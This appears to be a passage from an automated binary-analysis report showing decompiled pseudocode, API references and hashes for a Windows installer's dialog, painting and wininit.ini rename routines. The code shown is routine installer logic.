                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						SetWindowLongA(_t126, _t134, _t134);
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						DestroyWindow( *0x42ec18);
                                                                                                                                                                                                          						 *0x42ec18 = _a12;
                                                                                                                                                                                                          						L58:
                                                                                                                                                                                                          						if( *0x42b8b8 == _t134) {
                                                                                                                                                                                                          							_t143 =  *0x42ec18 - _t134; // 0x0
                                                                                                                                                                                                          							if(_t143 != 0) {
                                                                                                                                                                                                          								ShowWindow(_t126, 0xa);
                                                                                                                                                                                                          								 *0x42b8b8 = 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L61:
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}































                                                                                                                                                                                                          0x004040a2
                                                                                                                                                                                                          0x004040a2
                                                                                                                                                                                                          0x004040a2
                                                                                                                                                                                                          0x004040ac
                                                                                                                                                                                                          0x004040be
                                                                                                                                                                                                          0x004040ca
                                                                                                                                                                                                          0x004040cf
                                                                                                                                                                                                          0x004040d9
                                                                                                                                                                                                          0x004040df
                                                                                                                                                                                                          0x004040e1
                                                                                                                                                                                                          0x004040e6
                                                                                                                                                                                                          0x004040e3
                                                                                                                                                                                                          0x004040e3
                                                                                                                                                                                                          0x004040e3
                                                                                                                                                                                                          0x004040f6
                                                                                                                                                                                                          0x0040410e
                                                                                                                                                                                                          0x00404110
                                                                                                                                                                                                          0x00404116
                                                                                                                                                                                                          0x0040412b
                                                                                                                                                                                                          0x00404118
                                                                                                                                                                                                          0x00404121
                                                                                                                                                                                                          0x00404123
                                                                                                                                                                                                          0x00404123
                                                                                                                                                                                                          0x00404131
                                                                                                                                                                                                          0x00404142
                                                                                                                                                                                                          0x00404153
                                                                                                                                                                                                          0x0040415a
                                                                                                                                                                                                          0x00404160
                                                                                                                                                                                                          0x00404164
                                                                                                                                                                                                          0x00404169
                                                                                                                                                                                                          0x0040416b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404171
                                                                                                                                                                                                          0x00404171
                                                                                                                                                                                                          0x00404173
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404179
                                                                                                                                                                                                          0x0040417d
                                                                                                                                                                                                          0x004041a2
                                                                                                                                                                                                          0x004041a8
                                                                                                                                                                                                          0x004041ae
                                                                                                                                                                                                          0x004041b0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004041d6
                                                                                                                                                                                                          0x004041dc
                                                                                                                                                                                                          0x004041de
                                                                                                                                                                                                          0x004041e3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004041e9
                                                                                                                                                                                                          0x004041ec
                                                                                                                                                                                                          0x004041ef
                                                                                                                                                                                                          0x00404206
                                                                                                                                                                                                          0x00404212
                                                                                                                                                                                                          0x0040422b
                                                                                                                                                                                                          0x00404231
                                                                                                                                                                                                          0x00404235
                                                                                                                                                                                                          0x0040423a
                                                                                                                                                                                                          0x00404240
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040424a
                                                                                                                                                                                                          0x00404255
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404255
                                                                                                                                                                                                          0x0040417f
                                                                                                                                                                                                          0x00404185
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040418b
                                                                                                                                                                                                          0x00404191
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404197
                                                                                                                                                                                                          0x0040416b
                                                                                                                                                                                                          0x00404262
                                                                                                                                                                                                          0x0040426e
                                                                                                                                                                                                          0x00404275
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403fc5
                                                                                                                                                                                                          0x00403fc5
                                                                                                                                                                                                          0x00403fc8
                                                                                                                                                                                                          0x00403ffb
                                                                                                                                                                                                          0x00403ffb
                                                                                                                                                                                                          0x00403ffd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403ffd
                                                                                                                                                                                                          0x00403fca
                                                                                                                                                                                                          0x00403fce
                                                                                                                                                                                                          0x00403fd3
                                                                                                                                                                                                          0x00403fd5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403fe5
                                                                                                                                                                                                          0x00403fed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403ff3
                                                                                                                                                                                                          0x00403e21
                                                                                                                                                                                                          0x00403e21
                                                                                                                                                                                                          0x00403e25
                                                                                                                                                                                                          0x00403e2a
                                                                                                                                                                                                          0x00403e39
                                                                                                                                                                                                          0x00403e39
                                                                                                                                                                                                          0x00403e42
                                                                                                                                                                                                          0x00403e4b
                                                                                                                                                                                                          0x00403e56
                                                                                                                                                                                                          0x00403e56
                                                                                                                                                                                                          0x00403e62
                                                                                                                                                                                                          0x00403e7e
                                                                                                                                                                                                          0x00403e81
                                                                                                                                                                                                          0x00403e94
                                                                                                                                                                                                          0x00403e9a
                                                                                                                                                                                                          0x00403f3d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403f46
                                                                                                                                                                                                          0x00403ea0
                                                                                                                                                                                                          0x00403ead
                                                                                                                                                                                                          0x00403eaf
                                                                                                                                                                                                          0x00403eb1
                                                                                                                                                                                                          0x00403ed0
                                                                                                                                                                                                          0x00403ed0
                                                                                                                                                                                                          0x00403ed3
                                                                                                                                                                                                          0x00403ed8
                                                                                                                                                                                                          0x00403edb
                                                                                                                                                                                                          0x00403eeb
                                                                                                                                                                                                          0x00403eec

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403E56
                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403E6A
                                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00403E86
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403EA7
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00403EBB
                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403F70
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403F7A
                                                                                                                                                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403F94
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00403FE5
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 0040408B
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 004040BE
                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 004040D9
                                                                                                                                                                                                          • GetSystemMenu.USER32 ref: 004040EF
                                                                                                                                                                                                          • EnableMenuItem.USER32 ref: 004040F6
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0040410E
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404121
                                                                                                                                                                                                          • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 184305955-0
                                                                                                                                                                                                          • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                                                                                                                                          • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                          			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                          				struct HWND__* _t52;
                                                                                                                                                                                                          				long _t86;
                                                                                                                                                                                                          				int _t98;
                                                                                                                                                                                                          				struct HWND__* _t99;
                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                          				intOrPtr _t107;
                                                                                                                                                                                                          				intOrPtr _t109;
                                                                                                                                                                                                          				int _t110;
                                                                                                                                                                                                          				signed int* _t112;
                                                                                                                                                                                                          				signed int _t113;
                                                                                                                                                                                                          				char* _t114;
                                                                                                                                                                                                          				CHAR* _t115;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						if(_a8 != 0x4e) {
                                                                                                                                                                                                          							if(_a8 == 0x40b) {
                                                                                                                                                                                                          								 *0x429884 =  *0x429884 + 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L25:
                                                                                                                                                                                                          							_t110 = _a16;
                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                          							return E00404338(_a8, _a12, _t110);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                                                          						_t110 = _a16;
                                                                                                                                                                                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                                                                                                                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                                                                                                                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                                                                                                                          							_v12 = _t100;
                                                                                                                                                                                                          							_v16 = _t109;
                                                                                                                                                                                                          							_v8 = 0x42e3e0;
                                                                                                                                                                                                          							if(_t100 - _t109 < 0x800) {
                                                                                                                                                                                                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                                                                                                          								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                                                                                                          								_push(1);
                                                                                                                                                                                                          								_t40 =  &_v8; // 0x42e3e0
                                                                                                                                                                                                          								E004046E0(_a4,  *_t40);
                                                                                                                                                                                                          								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                                                                                                          								_t110 = _a16;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                                                                                                                          							goto L26;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                                                                                                                          								SendMessageA( *0x42f448, 0x111, 1, 0);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                                                                                                                          								SendMessageA( *0x42f448, 0x10, 0, 0);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t112 =  *0x42a090 + 0x14;
                                                                                                                                                                                                          						if(( *_t112 & 0x00000020) == 0) {
                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                                                                                                          						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                                                                                                          						E004046BC();
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t98 = _a16;
                                                                                                                                                                                                          				_t113 =  *(_t98 + 0x30);
                                                                                                                                                                                                          				if(_t113 < 0) {
                                                                                                                                                                                                          					_t107 =  *0x42ec1c; // 0x590f48
                                                                                                                                                                                                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                                                                                                                          				_t114 = _t113 +  *0x42f498;
                                                                                                                                                                                                          				_push(0x22);
                                                                                                                                                                                                          				_a16 =  *_t114;
                                                                                                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                          				_t115 = _t114 + 1;
                                                                                                                                                                                                          				_v16 = _t115;
                                                                                                                                                                                                          				_v8 = E00404407;
                                                                                                                                                                                                          				E004042D1(_a4);
                                                                                                                                                                                                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                                                                                                                          				_push(0x23);
                                                                                                                                                                                                          				E004042D1(_a4);
                                                                                                                                                                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                                                                                                          				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                                                                                                                          				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                                                          				E00404306(_t99);
                                                                                                                                                                                                          				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                                                                                                                          				_t86 =  *( *0x42f454 + 0x68);
                                                                                                                                                                                                          				if(_t86 < 0) {
                                                                                                                                                                                                          					_t86 = GetSysColor( ~_t86);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                                                                                                                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                                                                                                                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                                                                                                                          				 *0x429884 = 0;
                                                                                                                                                                                                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                                                                                                                                          				 *0x429884 = 0;
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                          • String ID: N$B
                                                                                                                                                                                                          • API String ID: 3103080414-4074832742
                                                                                                                                                                                                          • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                                                                                                                                          • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                                                                                                          				struct tagLOGBRUSH _v16;
                                                                                                                                                                                                          				struct tagRECT _v32;
                                                                                                                                                                                                          				struct tagPAINTSTRUCT _v96;
                                                                                                                                                                                                          				struct HDC__* _t70;
                                                                                                                                                                                                          				struct HBRUSH__* _t87;
                                                                                                                                                                                                          				struct HFONT__* _t94;
                                                                                                                                                                                                          				long _t102;
                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                          				struct HDC__* _t128;
                                                                                                                                                                                                          				intOrPtr _t130;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if(_a8 == 0xf) {
                                                                                                                                                                                                          					_t130 =  *0x42f454;
                                                                                                                                                                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                                                                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                                                                                                          					_a8 = _t70;
                                                                                                                                                                                                          					GetClientRect(_a4,  &_v32);
                                                                                                                                                                                                          					_t126 = _v32.bottom;
                                                                                                                                                                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                                                                                                          					while(_v32.top < _t126) {
                                                                                                                                                                                                          						_a12 = _t126 - _v32.top;
                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                                                                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                                                                                                          						_v32.bottom = _v32.bottom + 4;
                                                                                                                                                                                                          						_a16 = _t87;
                                                                                                                                                                                                          						FillRect(_a8,  &_v32, _t87);
                                                                                                                                                                                                          						DeleteObject(_a16);
                                                                                                                                                                                                          						_v32.top = _v32.top + 4;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                                                                                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                                                                                                          						_a16 = _t94;
                                                                                                                                                                                                          						if(_t94 != 0) {
                                                                                                                                                                                                          							_t128 = _a8;
                                                                                                                                                                                                          							_v32.left = 0x10;
                                                                                                                                                                                                          							_v32.top = 8;
                                                                                                                                                                                                          							SetBkMode(_t128, 1);
                                                                                                                                                                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                                                                                                          							_a8 = SelectObject(_t128, _a16);
                                                                                                                                                                                                          							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
                                                                                                                                                                                                          							SelectObject(_t128, _a8);
                                                                                                                                                                                                          							DeleteObject(_a16);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					EndPaint(_a4,  &_v96);
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t102 = _a16;
                                                                                                                                                                                                          				if(_a8 == 0x46) {
                                                                                                                                                                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                                                                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                                                                                                                          			}


                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                          • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                          • String ID: F$Setup Setup
                                                                                                                                                                                                          • API String ID: 941294808-1602013819
                                                                                                                                                                                                          • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                                                                                                                                          • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405EBC(void* __ecx) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				long _t12;
                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                          				intOrPtr* _t39;
                                                                                                                                                                                                          				long _t42;
                                                                                                                                                                                                          				CHAR* _t44;
                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t38 = __ecx;
                                                                                                                                                                                                          				_t44 =  *(_t52 + 0x14);
                                                                                                                                                                                                          				 *0x42c648 = 0x4c554e;
                                                                                                                                                                                                          				if(_t44 == 0) {
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
                                                                                                                                                                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                                                          						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
                                                                                                                                                                                                          						_t53 = _t52 + 0x10;
                                                                                                                                                                                                          						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
                                                                                                                                                                                                          						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
                                                                                                                                                                                                          						_t48 = _t12;
                                                                                                                                                                                                          						 *(_t53 + 0x18) = _t48;
                                                                                                                                                                                                          						if(_t48 != 0xffffffff) {
                                                                                                                                                                                                          							_t42 = GetFileSize(_t48, 0);
                                                                                                                                                                                                          							_t6 = _t37 + 0xa; // 0xa
                                                                                                                                                                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                                                                                                          							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
                                                                                                                                                                                                          								L18:
                                                                                                                                                                                                          								return CloseHandle(_t48);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                                                                                                          									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
                                                                                                                                                                                                          									if(_t49 == 0) {
                                                                                                                                                                                                          										_t48 =  *(_t53 + 0x18);
                                                                                                                                                                                                          										L16:
                                                                                                                                                                                                          										_t24 = _t42;
                                                                                                                                                                                                          										L17:
                                                                                                                                                                                                          										E00405DA1(_t24 + _t46, 0x42c248, _t37);
                                                                                                                                                                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                                                                                                          										E00405E8D(_t48, _t46, _t42 + _t37);
                                                                                                                                                                                                          										GlobalFree(_t46);
                                                                                                                                                                                                          										goto L18;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t39 = _t46 + _t42;
                                                                                                                                                                                                          									_t31 = _t39 + _t37;
                                                                                                                                                                                                          									while(_t39 > _t49) {
                                                                                                                                                                                                          										 *_t31 =  *_t39;
                                                                                                                                                                                                          										_t31 = _t31 - 1;
                                                                                                                                                                                                          										_t39 = _t39 - 1;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t24 = _t49 - _t46 + 1;
                                                                                                                                                                                                          									_t48 =  *(_t53 + 0x18);
                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                                                                                                          								_t42 = _t42 + 0xa;
                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					CloseHandle(E00405DE6(_t44, 0, 1));
                                                                                                                                                                                                          					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
                                                                                                                                                                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t12;
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          0x00405fb9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405fb9
                                                                                                                                                                                                          0x00405f85
                                                                                                                                                                                                          0x00405f63
                                                                                                                                                                                                          0x00405ee2
                                                                                                                                                                                                          0x00405eed
                                                                                                                                                                                                          0x00405ef6
                                                                                                                                                                                                          0x00405efa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405efa
                                                                                                                                                                                                          0x0040602b

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405EED
                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405EF6
